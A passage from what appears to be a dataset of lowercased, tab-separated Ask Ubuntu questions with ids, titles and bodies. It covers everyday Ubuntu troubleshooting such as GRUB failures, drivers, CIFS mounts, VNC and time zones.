0 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes 1 : dell-bluetooth : bluetooth soft blocked : yes hard blocked : yes output of lspci : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation panther point pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 07:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) output of lspci -v : 0:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) subsystem : dell device 0558 flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 0558 flags : bus master , fast devsel , latency 0 , irq 43 memory at f7800000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) subsystem : dell device 0558 flags : bus master , fast devsel , latency 0 , irq 42 memory at f7d0a000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 0558 flags : bus master , medium devsel , latency 0 , irq 16 memory at f7d08000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) subsystem : dell device 0558 flags : bus master , fast devsel , latency 0 , irq 44 memory at f7d00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=07 , subordinate=07 , sec-latency=0 memory behind bridge : f7c00000-f7cfffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.5 pci bridge : intel corporation panther point pci express root port 6 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=09 , subordinate=09 , sec-latency=0 i/o behind bridge : 0000e000-0000efff prefetchable memory behind bridge : 00000000f0000000-00000000f00fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 0558 flags : bus master , medium devsel , latency 0 , irq 23 memory at f7d07000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) subsystem : dell device 0558 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : dell device 0558 flags : bus master , 66mhz , medium devsel , latency 0 , irq 40 i/o ports at f0b0 [ size=8 ] i/o ports at f0a0 [ size=4 ] i/o ports at f090 [ size=8 ] i/o ports at f080 [ size=4 ] i/o ports at f060 [ size=32 ] memory at f7d06000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) subsystem : dell device 0558 flags : medium devsel , irq 11 memory at f7d05000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f040 [ size=32 ] kernel modules : i2c-i801 07:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) subsystem : dell device 0016 flags : bus master , fast devsel , latency 0 , irq 10 memory at f7c00000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) subsystem : dell device 0558 flags : bus master , fast devsel , latency 0 , irq 41 i/o ports at e000 [ size=256 ] memory at f0004000 ( 64-bit , prefetchable ) [ size=4k ] memory at f0000000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169
198856	ubuntu slow at boot because of gnome-set~ngs-daemon	when i boot my computer , the process gnome-set~ngs-daemon need a lot of disk access , according to sudo iotop , it require 100 % ... any idea how i can solve it ?
198857	will i be able to contribute to ubuntu in the future through other services in addition to paypal ?	now on desktop contribute page , i can donate only using paypal . will i be able to donate in the future , using , for example , visa credit card ?
198859	ubuntu 12.x on hp pavilion g6-1d21dx	what would it take to ensure that ubuntu 12.x is supported seamlessly on hp pavilion g6-1d21dx with amd a6 apu and radeon hd 6520g
198863	broken package on update manager	i dont know what 's wrong with my update manager.. it says that the softwares that i installed was broken . maybe because i force shutdown my laptop , because ubuntu wont shutdown , showing up desktop wallpaper but not title bar and launcher , but it wo n't shut down ( +that 's another bug ) . i 've just update the broken softwares . the size is 60 to 70 mb.. but it does n't work . now i can not update or install any software from update manager or ubuntu software center . can anybody tellme what 's wrong ? this is what appears when i use update manager i use ubuntu software center , and this message appeared i chose repair and when it update the broken softwares using ubuntu software center . it failed . and show up this message . the problem is i ca n't update or install any program from ubuntu software center and device manager anymore . ( i closed allprograms include ubuntu software center , and device manager in this case ) . some one helpme ? i tried to use apt-get install -f in terminal but it shows message like this : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
198864	how can i play different sounds each time i startup ?	i have read questions on changing startup sound in ubuntu and changing startup music in ubuntu . i understand how to rename 'desktop-login.ogg ' and copy the sound i want as 'desktop-login.ogg ' . my question is -is there a way i can play different sounds ( i.e . choose a random file from a set of files in a defined music folder ) each time i login ? it may sound silly , but if possible i would like to play different sounds . i am guessing that this may be perhaps possible by running some kind of script which replaces/renames the desktop-login.ogg file each time i shutdown , so that a new file is ready to be played on the next startup . but i do n't know how to copy a new file from a particular folder to desktop-login.ogg upon each shutdown , nor do i know where the script should reside . i would appreciate it if someone could tell me how to do it , or if there is an easier way of doing this . thank you
198865	how to synchronize a whole ubuntu ?	i think that the time is ripe to have my whole ubuntu synchronized just as my dropbox folder is . given that we are always talking about files and directories , what 's the difference between my documents folder and my /usr system directory ? almost none , except for their location . in fact , i think that there is just one big issue that prevents people to have their beloved installations mirrored wherever they go : symlinks . dropbox , google drive , ubuntu one , sugarsync , skydrive , none of these services support symlinking . this means that if i push a symlink in one of the synced folders , locally the symlink is kept as is , but remotely ( in the cloud or on the other synced machines ) the symlink is resolved to the actual file that was originally pointed to . this completely disrupts linux installations , thus these services ca n't be used for this purpose . so the question is : does anybody knows a way to achieve a completely synchronized ubuntu , always synchronized with a remote running copy , but still locally stored on both disks ? my best guess is that i could use nfs . but the main difference between dropbox and nfs is that nfs is a remote filesystem that always forces to remotely access the files , while dropbox pushes modifications to local filesystems ( and thus would perform better ) . i 've also heard about nfs caching . does anybody knows if this solution could approximate dropbox in this sense ? p.s . i know that /boot , /dev , /proc , /run , /tmp and device-specific mount points in /mnt and /media will have to be left out the sync mechanism . what i 'm interested in is the principle . can this be done with reasonable performance , having reasonable resources ( e.g . ~ 1mbps upload bandwidth and a public ip address ) ?
198866	sync music with a iphone 4 ios 6	is there any way to sync an iphone ios 6 with my pc ? i installed libimobiledevice and the iphone is shown up in rythmbox and shotwell . but when i want to sync music with it , it does n't work . there will be no music on my device . please help .
198876	how to install multiple versions of xampp ?	i 'm having trouble installing multiple versions of xampp on my machine . i am currently using version 1.7.7 and installed it in /opt/lampp , but i also need to install the previous version which is version 1.7.1 . so i downloaded and installed version 1.7.1 in /opt/lampp2 . but when i run /opt/lampp2/lampp startcommand to start 1.7.1 version , why does xampp show that the version that is currently running is 1.7.7 , when it should be 1.7.1 ?
198883	ubuntu live cd : how to switch user on livecd to `` root ''	i have created my customized live cd by following the instructions @ ubuntu forum thread 688872 the live cd gets created fine and it is able to bootup as well . i see my customized setting in place . i created the live cd using ubuntu 10.04 server edition . my issue is , when the system boots up with the live cd , it logs in automatically as `` ubuntu '' user . i want the system to login as `` root '' . because i will be running quite a few perl automation script off of the live cd and i need to have root privileges . now , i know the `` sudo '' way of doing it , but i am least bothered about the security aspect and want my system to switch to `` root '' user the moment it boots up . is there a hack to achieve the same ? update : if you cant resist to down vote my question , then please free to do so but do me a favor and let me know why you are down voting by dropping a comment .
198886	ubuntu starts a bit unexpectedly	when i first installed ubuntu 20 days ago , it started like a purple screen appears with ubuntu written and loading points and then the login screen . but now when it starts , it is like a purple screen appears and after 2 seconds it goes off and again it appears with ubuntu written and loading points . is this normal behavior ? this time when i installed ubuntu i removed cd from the drive before restarting . i did n't let ubuntu to first restart and then remove cd . is that behavior related to this happening ? this cd thing i 've explained here . please explain me .
198887	linux ps aux results - wierd processes	of late ive noticed multiple processes that arise looking like this . they amultiply every minute i think . i know their using memory but i dont know what 's causing them to appear in the first place . how can i resolve this and stop them from reappearing again ? www-data 2382 3.0 2.4 91924 12092 pts/1 sl+ 13:18 1:37 ./hlds_i686 -game cstrike +ip 0.0.0.0 +maxplayers 32 +map de www-data 2391 0.0 0.0 23748 464 ? ss 13:18 0:00 screen -d -m ./hlds_run -game cstrike +ip 0.0.0.0 +maxplayer www-data 2392 0.0 0.0 4008 496 pts/2 ss+ 13:18 0:00 /bin/sh ./hlds_run -game cstrike +ip 0.0.0.0 +maxplayers 32
198889	deploy minecraft server error	hey i have problem with deployment minecraft server on ubuntu maas/juju . when i juju ssh to node responsible to minecraft server i receive this : last login : thu oct 11 07:15:31 2012 from ubuntuserver.local ubuntu @ node-00127968a7be : ~ $ service minecraft status minecraft stop/waiting ubuntu @ node-00127968a7be : ~ $ service minecraft update minecraft : unrecognized service ubuntu @ node-00127968a7be : ~ $ service minecraft restart stop : unknown instance : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.14 '' ( uid=1000 pid=1501 comm= '' start minecraft `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) ubuntu @ node-00127968a7be : ~ $
198891	automatic hard drive access	i run qbittorrent for torrenting on ubuntu , and i have it set to drop downloads in the same hard drive , but on a different partition from what the os runs on . before i 'm able to start downloading , i have to manually navigate to the file path of the hard drive , as if the system has no access to it until i manually go and visit it . while i can manually access the hard drive prior to opening the program , it 's extremely annoying to get 20 errors flashing when i forget to . is there a way to over ride this other than installing to a different location ? i have my partitions setup in a way that it would be difficult to do it any other way ( windows is on my other internal ) .
198896	what is a simple , free soap client ( gui ) ?	on windows i would use soapui , which can be run on ubuntu either as a standalone application ( see instructions on how in this question ) or as an eclipse plugin . is there any other gui available - perhaps something in a repository - for testing soap services ?
198898	can not play youtube videos in smplayer ( v.0.8.0 ) using smtube ( v.1.1 )	everything seems ok in smplayer except that . youtube also works in internet browsers . changing smtube settings does n't help
198900	using rabbitvcs on 12.04	i was evaluating rabbitvcs as replacement of rapidsvn to connect to my svn repository on ubuntu server . this what i did on my 12.04 opened the ubuntu software centre searched for rabbitvcs-core and rabbitvcs-nautilus . they were listed . installed both of them and they are successfull installed . then , i used the dash home to see if i can find these programs . opened home folder and right clicked on certain folders which was checked out using rapid svn . i could not find any options to use rabbitvcs in nautilus from here . i restarted my machine and repeated both process again . so how can i use rabbitvcs ? am i seeing everything as it is expected or some thing weird ?
198901	recursively find every first file at each branch of a directory tree	consider the following directory listing : /a/1 /a/2 /a/3 /b/1 /b/2 /b/3/a /b/3/b /c/a.whatever /c/b /c/c i want a command that will find the first ( alphanumeric sort ) file in each directory ( inc nested ) and deliver the following output : /a/1 /b/1 /b/3/a /c/a.whatever this seems like a job for find but i 'm running low on coffee . release the ninjas !
198904	how to check which filesystem current kernel supports ?	i would like to know if it 's possible to check which filesystems my kernel supports . ( like btrfs , raiserfs , exfat , ... ) . man mount shows many options , but it 's not really possible to use all
198910	ubuntu 10.04 minimal installer hangs	i need to install an old version of ubuntu ( namely , 10.04 ) in a virtual machine using virtualbox . unfortunately it fails . my host operating system is ubuntu precise 32bit . i downloaded the 32bit image . just after selecting the mirror , the next screen asks for a http proxy ( which i leave blank ) , then the `` downloading release files '' window flashes briefly , finally it disappears and the screen stays blue with a grey band on the bottom . i have tried to install the current ubuntu version on the same virtual machine and it works perfectly . i tried vmware player , and it hangs the same way ! ! i tried to google for it , but it seems nobody has experienced this ? thanks !
198915	how to get all shell command logged	i 'm running ubuntu server 12.04 , and trying to get all shell command logged . i 'm trying with rsyslog that there by default . i added `` * . * /var/log/everything.log '' in rsyslog.conf and 50-default.conf , but i 'm only getting few entries ( login , logout , service stop/start ) and would like to have everything ls , cd [ path ] , [ wrong command ] . do i have to modify something in rsyslog or setting any other application to verbose . thx sp
198922	how can i install uplay on ubuntu ?	as stated in title , how can i do it ? when i start uplay it gives me an error and it 's all .
198927	what color format gnome terminal color pallete use ?	my question is as per title and more importantly , how to convert regular hex/rgb color format to the one that is used in gnome terminal color pallete ( eg # 26268b8bd2d2 ) ?
198931	how to set gnome terminal to scroll a fixed number of lines with the mouse wheel ?	gnome terminal 3.4.1.1 in ubuntu 12.04 has an imo weird mouse scroll behavior : a single mouse wheel motion scrolls ceiling ( $ lines / 10 ) lines , rather than a set number . that is , if the terminal window is between 31 and 40 lines , it will scroll four lines at a time . if it 's 100 lines , it will scroll 10 lines at a time . how can i force it to work like other applications , scrolling n lines regardless of the window height ?
198933	how would i know if my os is compromised ?	i had opened a php folder from a friend 's web host . i run it on mine to fix some bugs . then i tried attaching the code to be emailed and gmail stated that the attachment was infected by a virus . now i 'm afraid if my apache or os ( 12.04 ) is infected . i checked the php files and found a base64 encoded set of code being 'eval 'd at the top of each and every php file . just reversing it ( echo with htmlspecialchars ) showed some clue that there were sockets in use and something to do with permissions . and also there were two websites referred having .ru extensions . now i 'm afraid if my ubuntu system is affected or compromised . any advice please ! here 's my second run of rkhunter with the options : **sudo rkhunter -- check -- rwo warning : the command '/usr/bin/unhide.rb ' has been replaced by a script : /usr/bin/unhide.rb : ruby script , ascii text** **warning : hidden directory found : /dev/.udev** **warning : hidden file found : /dev/.initramfs : symbolic link to `/run/initramfs'**
198937	grub menu screen flicker	i am having a strange problem on my dell inspiron 1505 laptop . when starting the computer the grub screen flickers or every few seconds . i do n't know if it would be called a flicker . the screen actually superimposes another menu over the existing menu . it starts on the right side of the screen and then moves to where it normally sits . this `` flicker '' refreshes every few seconds and looks very unprofessional when starting up around other users . does anyone know what 's happening here ?
198939	system does n't boot when ubuntu is installed on an ssd	i 've recently discovered ubuntu and decided to give it a try . i am using a samsung series 5 p530u3c-ad1 which comes with a 24gb ssd and a ~500gb hdd , my intention is to set the system files to the ssd and the rest to the hdd . the system works fine if i do a direct install using only the hdd , but if i try using the ssd for the system files the computer does n't boot-up , i do not know if the ssd is being recognized by the computer , i think so because i could install ubuntu on it , but it does n't appear on the boot order or the boot menu . i read some posts and tried using boot-repair which pointed me not to forget to set my system to boot from my ssd , unfortunately i can not because of the issues mentioned above . thanks for your time .
198944	cd/dvd icon on unity panel/launcher	is it possible to have cd/dvd icon on the launcher by default ( regardless of whether cd/dvd is in the tray or not ) ? i have friends who would love to switch to ubuntu , but ubuntu does not seem to have drivers for special buttons on the laptop , like the one needed to eject the cd/dvd tray . they own one of those mini laptops which have a cd/dvd tray , but no button on the tray to eject it .
198946	manually change the screen resolution	my system : ubuntu 12.04 lts . my graphic card : nvidia geforce gt430 . my monitor is samsung le26r51b . and my connection is digital ( hdmi ) . the current screen resolution is not good at all , i ca n't see the top bar and the left one . here are the available resolutions in settings : 1920*1080 1280*720 960*600 and lower resolutions but with no one of these i can see the top bar in it . they are bigger than the monitor . in windows 7 i use 1202*670 resolution . how can i change the resolution to what i want exactly ?
198950	printing and pdf-export from libreoffice : svg images get rasterized in very bad resolution	i 'd like to print and export ( to pdf ) a document written in libreoffice writer which contains svg figures . on the screen , libreoffice displays and scales them correctly , but for pdf export ( which should support vector graphics natively ) and printing ( to a postscript printer ) the svgs get rasterized ( facepalm ) at a very low resolution . i have tried to enable `` reduce bitmap resolution '' and set it to 600 dpi , hoping that telling lo a definite number for the resolution might help , but there 's no change . how do i tell libreoffice to export and print scalable vector graphics as vector graphics or at least to rasterize them at a usable resolution ? here 's a screenshot of libreoffice writer ( zoom level 400 % ) : this is a screenshot of the pdf exported by libreoffice writer ( again 400 % zoom level ) : when printed from lo , the graphics looks just like in the pdf .
198951	clock is one hour too fast , how do i fix it ?	i have installed ubuntu 12.04 . i am in europe/dublin timezone . my clock is one hour fast . i 'm getting time off the internet . here is the output from dpkg-reconfigure tzdata at 15:41 . current default time zone : 'europe/dublin' local time is now : thu oct 11 16:41:54 ist 2012 . universal time is now : thu oct 11 15:41:54 utc 2012 . the time displayed in ubuntu is the wrong , late one : 16:41 .
198954	grub installation failed during ubuntu installation	i want to use ubuntu 12.04 long term support but during installation it showed me a message grub ca n't be installed . how can i install manually .
198965	how to fix file system 's chs geometry ?	i 'm trying to check fat16 file system with gparted and the check fails with the following message : the file system 's chs geometry is ( 484 , 16383 , 63 ) is invalid . the partition table 's chs geometry is ( 31130 , 255 , 63 ) . if you select ignore , the file system 's chs geometry will be left unchanged . if you select fix , the file system 's geometry will be set to match the partition table 's chs geometry . the check just fails without any ignore/fix prompting . how do i fix this ?
198975	lens for ask ubuntu in ubuntu 12.10	how do i install ask ubuntu lens in ubuntu 12.10 ?
198978	is there a benchmark tools for ubuntu ?	is there a benchmarker ( a tool to measure computer performance ) for ubuntu ( like superpi , 3dmark , or pcmark ) ?
198980	how to make web-server address into dns ?	i 'm using apache webserver on ubuntu base o/s . i want to change the web-server hostname to lets says xyz.compnayname.com.uk . the virtual machine that runs the web-server is stand-alone machine not part of domain as my host machine which is windows 7 . i want to know if by editing etc/hosts to ipaddress xyz.companyname.com.uk would allow the users to access my web-server by dns ? like http : //xyz.companyname.com.uk/whateverfile . or i need to make some changes into the apache configuration files too . thanks
198994	admin password reset successful , but not recognized on reboot	i 'm running version 12.04 , gnu grub version 1.99-21 ubuntu 3.1 . when i reset user/admin password using the root shell , it says that the password reset was successful . but , when i try to exit and normally reboot , the new password is not recognized by the system . why is it not working ?
199000	is es.archive.ubuntu.com down ? how can i change it ?	when i try to update with apt-get update , it seems to not resolve the server es.archive.ubuntu.com . is it down ? i suppose it 's a mirror of archive.ubuntu.com . if it is , how could i set my mirror to archive.ubuntu.com ? thanks !
199012	is there a facebook lens ?	is there a facebook lens in ubuntu 12.10 ? few of my friends are addicted to facebook and would love to use ubuntu if it comes with facebook lens . does anyone know how to install facebook lens ( if it exists ) ?
199013	running `` heavyweight '' applications with lightweight desktop environments	i have always been running xfce on my ubuntu machines for its performance advantage over the other des . however i run my favourite applications on it which includes apps traditionally bundled with gnome and kde ( gnome-power-statistics , gnome-system-monitor , kate , kdesvn to name a few ) . does this significantly diminish the performance advantage i get from using a lightweight desktop environment ? as a whole bunch of dependencies are installed when i first install these apps from other desktop environments .
199015	ca n't access vgaswitcheroo file , access denied ?	hi i 'm trying to change my integrated graphics card to my discrete graphics card ( nvidia geforce 540m ) and when i use the vgaswitcheroo method , i ca n't access the file doing this : $ ls -l /sys/kernel/debug/vgaswitcheroo/switch ls : can not access /sys/kernel/debug/vgaswitcheroo/switch : permission denied this is the link to the guide on using vgaswitcheroo i 'm using : https : //help.ubuntu.com/community/hybridgraphics i 'll be using nvidia unix drivers because i 'll be playing with the graphics card . any help ? thanks . ps . i 'm new at ubuntu , any help would be appreciated .
199021	using unity lenses outside of unity ?	unity lenses are becoming more interesting as time goes on , but unfortunately , you can only have its benefits if using a default unity session . while there are alternatives such as kupfer , or the now defunct unity-2d , a kubuntu** plasmoid to access unity lenses would be really valuable for integration , or plugins for launchers like kupfer or gnome-do . so since nobody seems interested i 'd like to try myself if possible at all . so my question is : is there any way to query , and get search results , from unity lenses without using unity ? any dbus-interface , some specific library , anything at all ? does n't need to be an easy `` run this one-line command '' solution , or give human-readable results . i can handle c or python coding . ** ( i say kubuntu but this would be valuable in any other mainline desktop environment , including cli )
199024	list firewalls on the local machine	in windows besides the windows firewall a user could have installed a firewall program , or there is another service listening to that port . in ubuntu how can i see what blocks/filters open ports ? iptables rules ? what about outbound connections ? thanks !
199026	how to start teamviewer or any program before login	teamviewer is a remote desktop application , it does n't have to be this one , i 'd be interested to know the following for any remote desktop application like vnc or rdp . i added a `` startup script '' to run teamviewer automatically but it only runs when i log in . is there a way to run such a program before any log in , so that the login can be done remotely ? many thanks !
199034	ubuntu 12.04 install on lenovo x120e - grub menu loads , but wo n't load ubuntu without usb in	i 've installed ubuntu using a usb the grub menu then would not load , so i followed : to reinstall grub : make a new ubuntu live cd and boot from it . install boot-repair using these commands : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install -y boot-repair boot-repair at this point , i have a grub menu that comes up , and i can load windows ( though there appears to be two entries to windows which i can live with for now ) , however i can not load ubuntu unless the usb is in . if the usb is in it appears that i am loading the version of ubuntu on my hd , but i 'm not 100 % sure . any way to remedy this ? i 'd like to be able to run ubuntu on the computer without the usb . thank you
199039	tried to install windows , and now can not boot ubuntu partitions - error loading operating system	i have one hard disk and two operating systems ubuntu and lubuntu . i wanted to install windows xp also but i had only two partitions . i used gparted to resize partition with lubuntu to get more space for new partition . after that i rebooted and wanted to install xp on new partition . but i could not choose that new partition , also i tried to delete it and create again , i did n't touch partition with ubuntu and lubuntu . as this did n't work i could n't choose this partition i decided to restart and see if i did mistake somewhere in gparted . but after restart i get `` error loading operating system '' . seems like i made mistakes in this process . now if someone can help me solve this ? i would be happy if is possible at last backup my data from ubuntu and lubuntu .
199041	is it safe to install both redis and mysql on the same system ?	mine is a question not on how to install either but on whether i can have both mysql and redis-server on my ubuntu 12.04 machine . i need both for different projects , any help forthcoming will be highly appreciated .
199044	how do i get my folders back on my desktop ?	using the 12.04 version . this morning the update manager popped up , i clicked it and it said some items will be un-installed and some will be upgraded and new ones will be installed . i did it and restarted . on restart , i entered my password about 5 times and it said it was incorrect . i changed the shell from gnome to ubuntu and logged on then changed it back to gnome and i was able to log on . however , all my folders on the screen are gone but they appear under desktop in the home folder . how do i get then back on the screen ?
199045	why do my cifs mounted drives become inaccessable after a few hours ?	i mount several drives on my machine . //selah-think/ubuntushare /home/selah/shares/ubuntushare cifs exec , credentials=/etc/cifspw , uid=1000 , dir_mode=0755 , file_mode=0644 0 0 //server123/groups/learninglab /home/selah/shares/learninglab cifs nounix , exec , credentials=/etc/cifspw , uid=1000 , dir_mode=0755 , file_mode=0644 0 0 almost without fail , after a couple hours and/or after my machine has gone idle , these drives become inaccessable . any command i issue that references these drives ( such as ls ) hangs for several minutes and ctr-c does nothing to stop the hang . the only way i 've found to fix it is to restart my machine . i notice when i look in my cifs file several messages like this which i think may be related : [ 22588.034488 ] cifs vfs : unexpected lookup error -112 [ 22598.026480 ] cifs vfs : unexpected lookup error -112 [ 22608.003788 ] cifs vfs : unexpected lookup error -112 i 'm using ubuntu 12.04 . previously i used ubuntu 10.04 and did not have the same problem accessing these drives . also i 'm using mount.cifs version : 5.1 any help appreciated ... thanks !
199049	how to fix a failing grub-pc package installation in hyper-v virtual machine ?	i am trying to install ubuntu server 12.04 64 bit on a windows hyper-v virtual machine . i am having issues with the following error : the grub-pc package failed to install into /target/ i have tried the suggestion of doing a `` rescue failed system '' and doing the apt-get to repair the boot loader , but my virtual machine ca n't download the updates due to dns issues ( for some reason , it 's not getting dns resolution ) . i have also tried reinstalling the boot loader in the rescue failed system , and the loader appears to install correctly ( no errors ) . but after rebooting the system , it will not boot . i 'm including a screenshot .
199053	how to setup extended desktop to untilize 12 monitors ?	we have a 12 monitor setup and we 're trying to make the gnome panel display across all the monitors . but we do n't know where to start . how can we use this 4x3 setup to use the full combined resolution as one gnome panel ? video cards : 2 x visiontek radeon 6870 2gb video cards
199057	mutt not working due to `` gnutls_handshake : a tls packet with unexpected length was received . '' error	i am expecting lots of problem trying to make mutt work in ubuntu 12.04 . here is my .muttrc : http : //paste.ubuntu.com/1273585/ here is the bug i am getting when i tried to connect . gnutls_handshake : a tls packet with unexpected length was received . do anyone knows a workaround to fix this error.if so please suggest it asap . many thanks in advance ! for debug here is the output of my mutt -v : http : //paste.ubuntu.com/1273590/
199064	suspend on powerloss ?	my laptop battery has essentially expired - runs my laptop for about 10 min . i would like my system to suspend if power is lost . can anyone help ? i am running ubuntu 12.04 .
199065	replacing the openjdk with the oracle jdk	i 've had the archive file for oracle 's jdk for some time and have been running java applications through ~/downloads/jdk1.7.0/bin/java -jar < jarfile > for some time , but i 'm wondering if there 's an actual way to `` install '' the jdk without running through the fiasco with apt-get that i ran into with a previous installation . also , can i point icedtea 's applet launcher to the oracle vm vs the openjdk one ?
199066	unity launcher and java chat windows	i 'm using java 7 to talk in this italian chat libero when i open several dialogue windows , unity launcher shows me only 1 icon and , when i click on it , only the last dialogue window appears and i ca n't see the others . what can i do ?
199069	volume control not working on one account	i am getting sound out of my speakers but , the volume control is not working and in the sound settings there is nothing listed in play sound through and test sound is not working . i am only having this problem on one account , it seems to work fine on other accounts . i am running 12.04 on a acer aspire 4743z-4861 .
199071	problem after suspend ubuntu 12.04	i 'd like to have a thing cleared . i just started using ubuntu and installed 12.04 the only problem is that when i turn my laptop back on after suspension i get a black screen with this written : legacy_resume ( ) : pnp_bus_resume+0x0/0x70 return -19 pm : device 00:09 failed to resume : error -19 i8042 : ca n't reactivate aux port and after this message at times my touchpad does n't work as well . i am currently using a vpc eh2n1e thanks for the support
199072	is vat included in the ubuntu one pricing ?	i 've been looking into various cross platform cloud storage/sync services lately . since the addition release of an os x client , ubuntu one is starting to look very interesting ( for various reasons i use all three platforms ) . i have a question , though , concerning the pricing plan . as a freelancer , i 've a vat-number ( registered in sweden ) , and would like to know if vat is included in the price . if yes , how do i go about to pull it off ? purchasing goods and services from outside of sweden , i 've noticed at least two ways to handle this , which is why i 'm asking . google for instance adds local tax which i then can pull off in my accounts with the swedish tax agency . amazon , on the other hand , asks for my vat-number , after which they themselves pull the vat off of my purchases . how does canonical handle this ? for what it matters , i 'm looking into 50-100 gb of storage .
199073	bash error : nesting 'if .. elif ' inside 'for .. in ' construct	when i run the code below : ifs= $ '\n' for line in `more extensions.txt` do if grep ' [ 219..223 ] ' $ { line:96:4 } ; then ... else ... fi done i keep getting the error : bash : syntax error near unexpected token 'if' help , anyone ?
199075	ca n't start vino vnc service on ubuntu 12.04	i just installed vino , but when i run it , i get the following error . # ./start_vnc ( vino-server:2502 ) : eggsmclient-critical ** : egg_sm_client_set_mode : assertion `global_client == null || global_client_mode == egg_sm_client_mode_disabled ' failed ** message : the desktop sharing service is already running , exiting . more details : ultravnc client running on a windows computer can login and shows the ubuntu desktop , and controls the ubuntu mouse to do things , but the vnc client view at the windows computer does not show any changes to the display at the ubuntu desktop , only the original desktop view at the time of vnc client login . update i solved it by following the askubuntu post : vnc session very slow in 12.04 compared to older versions , which said to do this : gsettings set org.gnome.vino disable-xdamage true ..and it worked . but should i be concerned about the error messages ?
199080	how to configure permanent autologin ?	i 'm trying to set up an ubuntu 12.04 machine as a kiosk and i would like it , on boot , to automatically log in as my kiosk user `` kiosk '' , and start the appropriate display manager , in this case blackbox . i have configured /etc/lightdm/lightdm.conf as in this question and have an appropriate /usr/share/xsessions/blackbox.desktop to launch blackbox . i managed to get initial autologin by using the dbus-send method in this question , however if i right-click and select `` exit '' from blackbox , then i am taken back to the login screen . how can i configure lightdm/ubuntu to always autologin as `` kiosk '' instead of displaying the login screen ? or , failing that , how can i configure blackbox to not display a menu when i right-click ?
199085	if i copy the ubuntu installation files to usb , will it delete everything on that drive ?	if i copy the ubuntu install files to usb in order to install on another pc , will it reformat ( i.e . delete ) everything on that usb drive ? or will it still function as before and all previous files remain on it ?
199090	ca n't sync photos from droidx2 external microsd card	i ca n't find or select the camera directory that is located on the microsd card in my droid x2 phone from your android app . it will only allow me to select the camera directory on the internal memory . however , all my photos are on the 16 gb microsd card . any solutions to this issue ? i am trying dropbox and it is working like a charm .
